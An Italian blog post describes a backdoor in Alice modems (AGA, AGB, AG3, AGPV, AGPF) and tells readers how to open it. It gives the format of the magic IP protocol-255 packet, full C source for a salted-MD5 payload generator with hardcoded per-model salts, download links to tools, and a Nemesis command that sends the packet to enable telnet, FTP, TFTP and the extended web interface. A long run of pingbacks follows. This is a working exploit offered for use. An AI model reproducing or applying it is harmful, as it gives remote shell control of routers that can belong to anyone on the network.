Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli

Questo articolo è dedicato allo sblocco dei modelli AGA/AGB/AG2P-AG3/AGPV-AGPF dei modem Alice mediante backdoor.

se volete essere seguiti passo per passo o volete la soluzione pronta contattatemi via mail (la trovate nella Home) e cercherò di aiutarvi.

Io e drPepperOne abbiamo scoperto una backdoor nei modem Alice a base Broadcom che permette in un solo colpo da LAN di abilitare telnet, ftp, tftp e modalità web estesa. Ciò che molti non sanno è che nei modem c’è un vero e proprio Sistema Operativo e che telnet implementa in questi casi una vera e propria shell remota da cui controllare l’intero sistema. Inoltre le interfacce web estese (credo tutte) presentano una pagina per cambiare firmware senza troppe difficoltà

Per abilitare la backdoor è sufficiente inviare un pacchetto IP opportunamente formattato al modem su cui c’è un socket raw in ascolto.

Tale pacchetto deve avere le seguenti caratteristiche:

protocollo IP
Protocol Number 255
lunghezza 28 byte (8 byte di payload)
il payload è costituito dai primi 8 byte dell’md5 con salt del mac del device br0

in questi modelli di modem br0 ha lo stesso mac di eth0 ed è quindi facile da reperire. Esso si potrebbe anche ottenere dai mac di eth1 e wl0 che sono più o meno consecutivi a seconda dei modelli dei modem. Su AGA per esempio mac(eth1)=mac(eth0)+1 e mac(wl0)=mac(eth0)+4.

L’algoritmo di creazione del payload è il seguente:

Così com’è il programma prevede che venga passato come parametro un file di 6 byte contenente il mac di br0.Il file compilato su WinXP lo travate al seguente link:
saxdax & drPepperOne

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include
#include
#include
#include “md5.h”

/*
* RFC 1321 compliant MD5 implementation
*
* Copyright (C) 2001-2003 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#define GET_UINT32(n,b,i) \
{ \
(n) = ( (uint32) (b)[(i) ] ) \
| ( (uint32) (b)[(i) + 1] << 8 ) \
| ( (uint32) (b)[(i) + 2] << 16 ) \
| ( (uint32) (b)[(i) + 3] << 24 ); \
}

#define PUT_UINT32(n,b,i) \
{ \
(b)[(i) ] = (uint8) ( (n) ); \
(b)[(i) + 1] = (uint8) ( (n) >> 8 ); \
(b)[(i) + 2] = (uint8) ( (n) >> 16 ); \
(b)[(i) + 3] = (uint8) ( (n) >> 24 ); \
}

void md5_starts( md5_context *ctx )
{
ctx->total[0] = 0;
ctx->total[1] = 0;

ctx->state[0] = 0x67452301;
ctx->state[1] = 0xEFCDAB89;
ctx->state[2] = 0x98BADCFE;
ctx->state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
uint32 X[16], A, B, C, D;

GET_UINT32( X[0], data, 0 );
GET_UINT32( X[1], data, 4 );
GET_UINT32( X[2], data, 8 );
GET_UINT32( X[3], data, 12 );
GET_UINT32( X[4], data, 16 );
GET_UINT32( X[5], data, 20 );
GET_UINT32( X[6], data, 24 );
GET_UINT32( X[7], data, 28 );
GET_UINT32( X[8], data, 32 );
GET_UINT32( X[9], data, 36 );
GET_UINT32( X[10], data, 40 );
GET_UINT32( X[11], data, 44 );
GET_UINT32( X[12], data, 48 );
GET_UINT32( X[13], data, 52 );
GET_UINT32( X[14], data, 56 );
GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 – n)))

#define P(a,b,c,d,k,s,t) \
{ \
a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \
}

A = ctx->state[0];
B = ctx->state[1];
C = ctx->state[2];
D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

P( A, B, C, D, 0, 7, 0xD76AA478 );
P( D, A, B, C, 1, 12, 0xE8C7B756 );
P( C, D, A, B, 2, 17, 0x242070DB );
P( B, C, D, A, 3, 22, 0xC1BDCEEE );
P( A, B, C, D, 4, 7, 0xF57C0FAF );
P( D, A, B, C, 5, 12, 0x4787C62A );
P( C, D, A, B, 6, 17, 0xA8304613 );
P( B, C, D, A, 7, 22, 0xFD469501 );
P( A, B, C, D, 8, 7, 0x698098D8 );
P( D, A, B, C, 9, 12, 0x8B44F7AF );
P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
P( B, C, D, A, 11, 22, 0x895CD7BE );
P( A, B, C, D, 12, 7, 0x6B901122 );
P( D, A, B, C, 13, 12, 0xFD987193 );
P( C, D, A, B, 14, 17, 0xA679438E );
P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

P( A, B, C, D, 1, 5, 0xF61E2562 );
P( D, A, B, C, 6, 9, 0xC040B340 );
P( C, D, A, B, 11, 14, 0x265E5A51 );
P( B, C, D, A, 0, 20, 0xE9B6C7AA );
P( A, B, C, D, 5, 5, 0xD62F105D );
P( D, A, B, C, 10, 9, 0x02441453 );
P( C, D, A, B, 15, 14, 0xD8A1E681 );
P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
P( A, B, C, D, 9, 5, 0x21E1CDE6 );
P( D, A, B, C, 14, 9, 0xC33707D6 );
P( C, D, A, B, 3, 14, 0xF4D50D87 );
P( B, C, D, A, 8, 20, 0x455A14ED );
P( A, B, C, D, 13, 5, 0xA9E3E905 );
P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
P( C, D, A, B, 7, 14, 0x676F02D9 );
P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F

#define F(x,y,z) (x ^ y ^ z)

P( A, B, C, D, 5, 4, 0xFFFA3942 );
P( D, A, B, C, 8, 11, 0x8771F681 );
P( C, D, A, B, 11, 16, 0x6D9D6122 );
P( B, C, D, A, 14, 23, 0xFDE5380C );
P( A, B, C, D, 1, 4, 0xA4BEEA44 );
P( D, A, B, C, 4, 11, 0x4BDECFA9 );
P( C, D, A, B, 7, 16, 0xF6BB4B60 );
P( B, C, D, A, 10, 23, 0xBEBFBC70 );
P( A, B, C, D, 13, 4, 0x289B7EC6 );
P( D, A, B, C, 0, 11, 0xEAA127FA );
P( C, D, A, B, 3, 16, 0xD4EF3085 );
P( B, C, D, A, 6, 23, 0x04881D05 );
P( A, B, C, D, 9, 4, 0xD9D4D039 );
P( D, A, B, C, 12, 11, 0xE6DB99E5 );
P( C, D, A, B, 15, 16, 0x1FA27CF8 );
P( B, C, D, A, 2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

P( A, B, C, D, 0, 6, 0xF4292244 );
P( D, A, B, C, 7, 10, 0x432AFF97 );
P( C, D, A, B, 14, 15, 0xAB9423A7 );
P( B, C, D, A, 5, 21, 0xFC93A039 );
P( A, B, C, D, 12, 6, 0x655B59C3 );
P( D, A, B, C, 3, 10, 0x8F0CCC92 );
P( C, D, A, B, 10, 15, 0xFFEFF47D );
P( B, C, D, A, 1, 21, 0x85845DD1 );
P( A, B, C, D, 8, 6, 0x6FA87E4F );
P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
P( C, D, A, B, 6, 15, 0xA3014314 );
P( B, C, D, A, 13, 21, 0x4E0811A1 );
P( A, B, C, D, 4, 6, 0xF7537E82 );
P( D, A, B, C, 11, 10, 0xBD3AF235 );
P( C, D, A, B, 2, 15, 0x2AD7D2BB );
P( B, C, D, A, 9, 21, 0xEB86D391 );

#undef F

ctx->state[0] += A;
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;

if( ! length ) return;

left = ctx->total[0] & 0x3F;
fill = 64 – left;

ctx->total[0] += length;
ctx->total[0] &= 0xFFFFFFFF;

if( ctx->total[0] < length )
ctx->total[1]++;

if( left && length >= fill )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, fill );
md5_process( ctx, ctx->buffer );
length -= fill;
input += fill;
left = 0;
}

while( length >= 64 )
{
md5_process( ctx, input );
length -= 64;
input += 64;
}

if( length )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, length );
}
}

static uint8 md5_padding[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
uint32 last, padn;
uint32 high, low;
uint8 msglen[8];

high = ( ctx->total[0] >> 29 )
| ( ctx->total[1] << 3 );
low = ( ctx->total[0] << 3 );

PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );

//for(int i=0;i<8;i++) printf(“length %d\n”,msglen[i]);

last = ctx->total[0] & 0x3F;
padn = ( last < 56 ) ? ( 56 – last ) : ( 120 – last );

md5_update( ctx, md5_padding, padn );
md5_update( ctx, msglen, 8 );

PUT_UINT32( ctx->state[0], digest, 0 );
PUT_UINT32( ctx->state[1], digest, 4 );
PUT_UINT32( ctx->state[2], digest, 8 );
PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
“”,
“a”,
“abc”,
“message digest”,
“abcdefghijklmnopqrstuvwxyz”,
“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789”,
“12345678901234567890123456789012345678901234567890123456789012” \
“345678901234567890”
};

static char *val[] =
{
“d41d8cd98f00b204e9800998ecf8427e”,
“0cc175b9c0f1b6a831c399e269772661”,
“900150983cd24fb0d6963f7d28e17f72”,
“f96b697d7cb7938d525a2f31aaf161d0”,
“c3fcd3d76192e4007dfb496cca67e13b”,
“d174ab98d277d9f5a5611c2c9f419d9f”,
“57edf4a22be3c955ac49da2e2107b67a”
};

//Salt per AGA/AGB/AG3(Vela)
static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};
//Salt per AGPV/AGPF
//static char saltOrig[] =
//{0x43, 0x22, 0x11, 0x11, 0x22, 0x81, 0xFA, 0x65, 0x11, 0x41, 0x54, 0x11, 0x17, 0x12, 0x15, 0x22, 0x72, 0x03, 0x10, 0x66};

int main( int argc, char *argv[] )
{
FILE *f;
int i, j;
char output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char md5sum[16];
unsigned char salt[20];

printf( “****************************\n”);
printf( “Alice BackDoor hash creator \n”);
printf( “by saxdax and drPepperOne \n”);
printf( “****************************\n\n”);

if( argc < 2 )
{
printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
return 0;
}

if( ! ( f = fopen( argv[1], “rb” ) ) )
{
perror( “fopen” );
return( 1 );
}

md5_starts( &ctx );

while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
{
md5_update( &ctx, buf, i );
}

memcpy(salt, saltOrig, 20);

md5_update( &ctx, salt, 20 );

md5_finish( &ctx, md5sum );

printf(“Payload is: “);
for( j = 0; j < 8; j++ )
{
printf( “%02x”, md5sum[j] );
}

return( 0 );
}

AGA/AGB/AG3 http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html
AGPV/AGPF http://rapidshare.com/files/156053651/md5_AGPV_AGPF.exe.html

Tali programmi sono validi fino alle seguenti versioni di firmware:

AG2P: 3.1.0
AG3: 3.2.4
AGA: 3.2.4
AGB: 3.2.4
AGPF: AGPF_4.3.4.0001 (e la 4.4.0)
AGPV: 4.3.1

Il programma deve essere lanciato da linea di comando e restituisce a video gli 8 byte del payload.

A questo punto potete utilizzare qualsiasi strumento di injection preferiate.

Io ho utilizzato Colasoft Packet Builder, generatore visuale con GUI su Windows.

Allego il template di un pacchetto già pronto in cui cambiare solo IP del modem e del pc, mac del modem e del pc e payload (nalla parte in basso a sinistra esadecimale di colasoft PB):

http://www.megaupload.com/?d=8OH6NFX1

drPepperOne ha utilizzato Nemesis da linea di comando, disponibile per Linux e Windows.

Una volta creato un file di 8 byte con un editor esadecimale, con nome per es. hash.hex, la sintassi da usare con Nemesys è:

Code: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

Se il pacchetto è corretto il router risponderà con un pacchetto ICMP con codici 3 e 2 (protocol unreachable).

A questo punto potete collegarvi a telnet, ftp e tftp ed utilizzare l’interfaccia web estesa senza aver aperto il modem!

Buon divertimento.

348 thoughts on “Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli”

Pingback: kirk
Pingback: ralph
Pingback: Cody
Pingback: shaun
Pingback: Louis
Pingback: lester
Pingback: Clarence
Pingback: Sergio
Pingback: carlton
Pingback: Ruben
Pingback: hugh
Pingback: donald
Pingback: Nathan
Pingback: Seth
Pingback: ricky
Pingback: Howard
Pingback: henry
Pingback: thomas
Pingback: Darryl
Pingback: dana
Pingback: gabriel
Pingback: willie
Pingback: Arnold
Pingback: Joe
Pingback: nathan
Pingback: jesse
Pingback: Gabriel
Pingback: Darrell
Pingback: lance
Pingback: ralph
Pingback: felix
Pingback: oliver
Pingback: Joey
Pingback: cory
Pingback: nick
Pingback: Joseph
Pingback: ray
Pingback: cameron
Pingback: scott
Pingback: shaun
Pingback: lynn
Pingback: Allen
Pingback: stephen
Pingback: Austin
Pingback: Phillip
Pingback: Joey
Pingback: Cameron
Pingback: kent

Comments are closed.